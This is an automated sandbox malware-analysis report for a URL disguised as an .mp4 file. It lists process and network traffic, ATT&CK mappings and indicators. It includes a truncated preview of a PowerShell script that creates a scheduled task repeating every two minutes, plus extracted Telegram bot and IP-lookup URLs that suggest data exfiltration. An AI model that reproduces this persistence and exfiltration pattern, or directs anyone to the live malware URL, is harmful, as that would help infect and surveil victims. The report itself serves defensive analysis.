Edit tour

Windows Analysis Report
http://passtcnet.homeunix.com/amj/2.mp4

Overview

General Information

Sample URL:	http://passtcnet.homeunix.com/amj/2.mp4
Analysis ID:	1501323
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2036,i,16277629979526969890,13013760856666354857,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://passtcnet.homeunix.com/amj/2.mp4" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: http://passtcnet.homeunix.com/amj/2.mp4

Avira URL Cloud: detection malicious, Label: malware

Source: http://passtcnet.homeunix.com/amj/2.mp4

HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /amj/2.mp4 HTTP/1.1Host: passtcnet.homeunix.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /amj/2.mp4 HTTP/1.1Host: passtcnet.homeunix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: identity;q=1, ;q=0Accept: /*Referer: http://passtcnet.homeunix.com/amj/2.mp4Accept-Language: en-US,en;q=0.9Range: bytes=0-

Source: global traffic	DNS traffic detected: DNS query: passtcnet.homeunix.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: chromecache_42.2.dr	String found in binary or memory: https://api.ipify.org?format=text
Source: chromecache_42.2.dr	String found in binary or memory: https://api.telegram.org/bot$BotToken/sendMessage

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: classification engine

Classification label: mal48.win@16/2@6/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2036,i,16277629979526969890,13013760856666354857,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://passtcnet.homeunix.com/amj/2.mp4"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2036,i,16277629979526969890,13013760856666354857,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
http://passtcnet.homeunix.com/amj/2.mp4	100%	Avira URL Cloud	malware

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://api.ipify.org?format=text	0%	Avira URL Cloud	safe
https://api.telegram.org/bot$BotToken/sendMessage	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	216.58.212.132	true	false	unknown
passtcnet.homeunix.com	43.130.11.15	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://passtcnet.homeunix.com/amj/2.mp4	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org?format=text	chromecache_42.2.dr	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot$BotToken/sendMessage	chromecache_42.2.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.68	unknown	United States	15169	GOOGLEUS	false
43.130.11.15	passtcnet.homeunix.com	Japan	4249	LILLY-ASUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
216.58.212.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501323
Start date and time:	2024-08-29 18:36:35 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://passtcnet.homeunix.com/amj/2.mp4
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.win@16/2@6/6

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.184.195, 172.217.16.206, 64.233.184.84, 34.104.35.123, 13.85.23.86, 93.184.221.240, 52.165.164.15, 192.229.221.95, 40.127.169.103, 142.250.186.131, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://passtcnet.homeunix.com/amj/2.mp4

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 42

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (38990), with CRLF line terminators
Category:	downloaded
Size (bytes):	177452
Entropy (8bit):	3.5732572779877785
Encrypted:	false
SSDEEP:	3072:PQoHePVWwLILwNW5rKJNXfEMMw4NcL8hDcseHcTt6tPgzGJhG:PRHePVWwLILwNW5rKJNXstl
MD5:	6666B27F5AAD69D79B0B4E5B3ACD3F08
SHA1:	E39C6EA232566083CB562E625644EBDE36D1029D
SHA-256:	32275286B3FCAA7DA9FE1CA249F883B6BDD5F82E3D36ACFAA5776A3F0385CD7A
SHA-512:	408B1EAC4FFBF2CC55C70034EC8207F6D433CE668C79D9DCC78ECC63E468A25284445466E877E375CF159567F3E120A5E0C4FC9F2C96D0E9DDAF813B10C5C417
Malicious:	false
Reputation:	low
URL:	http://passtcnet.homeunix.com/amj/2.mp4:2f7f6b5ff0fdb4:0
Preview:	..$Content = @'..<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <TimeTrigger>.. <Repetition>.. <Interval>PT2M</Interval>.. <StopAtDurationEnd>false</StopAtDurationEnd>.. </Repetition>.. <StartBoundary>2023-01-01T00:00:00</StartBoundary>.. <Enabled>true</Enabled>.. </TimeTrigger>.. </Triggers>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>true</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>tru

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 18:37:20.750593901 CEST	49675	443	192.168.2.4	173.222.162.32
Aug 29, 2024 18:37:30.432646036 CEST	49675	443	192.168.2.4	173.222.162.32
Aug 29, 2024 18:37:32.847177029 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:32.847771883 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:32.853163958 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:32.853266001 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:32.853323936 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:32.853377104 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:32.853456020 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:32.859245062 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.442414999 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.442544937 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.442559004 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.442594051 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.443840981 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.443854094 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.443893909 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.485327959 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.516840935 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.516860008 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.516866922 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.516920090 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.517514944 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.517525911 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.517574072 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.517962933 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.517975092 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.518018007 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.531115055 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.531167984 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.531419039 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.531430960 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.531461954 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.587124109 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.587399960 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.587412119 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.587445974 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.587697029 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.587723970 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.588668108 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.588680029 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.588710070 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.588757992 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.589911938 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.589924097 CEST	80	49735	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.589965105 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.589977026 CEST	49735	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.700558901 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.706799984 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.875133038 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.875374079 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.875391960 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.875417948 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.876524925 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.876540899 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.876559019 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.931952000 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.939281940 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.939584970 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.939599037 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.939627886 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.940907001 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.940922976 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.940957069 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.942097902 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.942111969 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.942137957 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.961666107 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.961720943 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.961738110 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:33.961756945 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:33.961786985 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.007920027 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.008235931 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.008249998 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.008311033 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.008941889 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.008955002 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.008980036 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.010420084 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.010435104 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.010462999 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.011476040 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.011527061 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.031918049 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.032355070 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.032370090 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.032397032 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.033447027 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.033463955 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.033480883 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.034775019 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.034789085 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.034907103 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.036134005 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.036179066 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.077931881 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.078512907 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.078526020 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.078562975 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.079155922 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.079170942 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.079200983 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.080626965 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.080650091 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.080682039 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.081851959 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.081868887 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.081912994 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.083175898 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.083190918 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.083204031 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.083218098 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.083241940 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.084469080 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.100678921 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.100754023 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.100914955 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.100929022 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.100960970 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.101910114 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.101928949 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.101963043 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.102880001 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.102894068 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.102907896 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.102961063 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.147466898 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.147542000 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.147876978 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.147893906 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.147927046 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.149079084 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.149091959 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.149126053 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.150216103 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.150228977 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.150280952 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.151432037 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.151446104 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.151515961 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.152896881 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.152910948 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.152944088 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.154480934 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.154498100 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.154544115 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.156083107 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.156096935 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.156131029 CEST	49736	80	192.168.2.4	43.130.11.15
